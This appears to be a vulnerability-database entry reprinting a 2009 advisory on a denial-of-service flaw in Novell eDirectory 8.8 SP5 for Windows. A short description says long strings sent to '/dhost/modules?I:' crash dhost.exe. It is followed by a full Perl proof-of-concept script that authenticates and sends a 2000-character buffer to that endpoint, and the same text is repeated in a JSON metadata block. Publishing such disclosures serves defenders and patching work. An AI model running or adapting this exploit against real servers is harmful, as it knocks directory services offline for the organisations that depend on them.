Search...

Novell eDirectory 8.8 SP5 Denial of Service

2009-11-13T00:00:00

ID SSV:12635
Type seebug
Reporter Root
Modified 2009-11-13T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Product:
Novell eDirectory 8.8 sp5 for Windows


********************************************************************************
Vulnerability:
Denial of Service



********************************************************************************
Discussion:
Vulnerability in '/dhost/modules?I:'
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)
Also in last weeks published another bug in 'modules?L:'
It is not patched yet too..



********************************************************************************
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com



********************************************************************************

Original Advisory
www.hackattack.com



********************************************************************************
PoC:

#!usr\bin\perl
#Vulnerability has found by HACKATTACK

use WWW::Mechanize; 

use LWP::Debug qw(+);

use HTTP::Cookies;

$address=$ARGV[0]; 


if(!$ARGV[0]){

        print &quot;Usage:perl $0 address\n&quot;;
	
exit();
}



$login = &quot;$address/_LOGIN_SERVER_&quot;;

$url = &quot;$address/dhost/&quot;;

$module = &quot;modules?I:&quot;;

$buffer = &quot;A&quot; x 2000;


$vuln = $module.$buffer;

#Edit the username and password.

	  $user = &quot;username&quot;;
 
 	  $pass = &quot;password&quot;; 

#Edit the username and password.
 
my $mechanize = WWW::Mechanize-&gt;new();


$mechanize-&gt;cookie_jar(HTTP::Cookies-&gt;new(file =&gt; &quot;$cookie_file&quot;,autosave =&gt; 1));


$mechanize-&gt;timeout($url_timeout); 

$res = $mechanize-&gt;request(HTTP::Request-&gt;new('GET', &quot;$login&quot;)); 


    $mechanize-&gt;submit_form( 

                  form_name =&gt; &quot;authenticator&quot;, 

                  fields    =&gt; {        
            
                     usr =&gt; $user, 

                     pwd =&gt; $pass}, 

                     button =&gt; 'Login'); 

$response2 = $mechanize-&gt;get(&quot;$url$vuln&quot;);


About HACKATTACK
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company \
located in Germany and Austria


More Information about HACKATTACK at
http://www.hackattack.com

JSON Vulners Source

Initial Source

{"sourceData": "\n Product:\r\nNovell eDirectory 8.8 sp5 for Windows\r\n\r\n\r\n********************************************************************************\r\nVulnerability:\r\nDenial of Service\r\n\r\n\r\n\r\n********************************************************************************\r\nDiscussion:\r\nVulnerability in '/dhost/modules?I:'\r\nSending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)\r\nAlso in last weeks published another bug in 'modules?L:'\r\nIt is not patched yet too..\r\n\r\n\r\n\r\n********************************************************************************\r\nCredits:\r\nHACKATTACK IT SECURITY GmbH\r\nPenetration Testing in Deutschland - \u00d6sterreich - Schweiz\r\nwww.hackattack.com\r\n\r\n\r\n\r\n********************************************************************************\r\n\r\nOriginal Advisory\r\nwww.hackattack.com\r\n\r\n\r\n\r\n********************************************************************************\r\nPoC:\r\n\r\n#!usr\\bin\\perl\r\n#Vulnerability has found by HACKATTACK\r\n\r\nuse WWW::Mechanize; \r\n\r\nuse LWP::Debug qw(+);\r\n\r\nuse HTTP::Cookies;\r\n\r\n$address=$ARGV[0]; \r\n\r\n\r\nif(!$ARGV[0]){\r\n\r\n print "Usage:perl $0 address\\n";\r\n\t\r\nexit();\r\n}\r\n\r\n\r\n\r\n$login = "$address/_LOGIN_SERVER_";\r\n\r\n$url = "$address/dhost/";\r\n\r\n$module = "modules?I:";\r\n\r\n$buffer = "A" x 2000;\r\n\r\n\r\n$vuln = $module.$buffer;\r\n\r\n#Edit the username and password.\r\n\r\n\t $user = "username";\r\n \r\n \t $pass = "password"; \r\n\r\n#Edit the username and password.\r\n \r\nmy $mechanize = WWW::Mechanize->new();\r\n\r\n\r\n$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));\r\n\r\n\r\n$mechanize->timeout($url_timeout); \r\n\r\n$res = $mechanize->request(HTTP::Request->new('GET', "$login")); \r\n\r\n\r\n $mechanize->submit_form( \r\n\r\n form_name => "authenticator", \r\n\r\n fields => { \r\n \r\n usr => $user, \r\n\r\n pwd => $pass}, \r\n\r\n button => 'Login'); \r\n\r\n$response2 = $mechanize->get("$url$vuln");\r\n\r\n\r\nAbout HACKATTACK\r\n================\r\nHACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company \\\r\nlocated in Germany and Austria\r\n\r\n\r\nMore Information about HACKATTACK at\r\nhttp://www.hackattack.com\n ", "status": "poc", "history": [], "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12635", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-12635", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 0, "references": [], "lastseen": "2017-11-19T18:30:33", "published": "2009-11-13T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:12635", "enchantments_done": [], "modified": "2009-11-13T00:00:00", "title": "Novell eDirectory 8.8 SP5 Denial of Service", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"vulnersScore": 5.0}, "_object_type": "robots.models.seebug.SeebugBulletin"}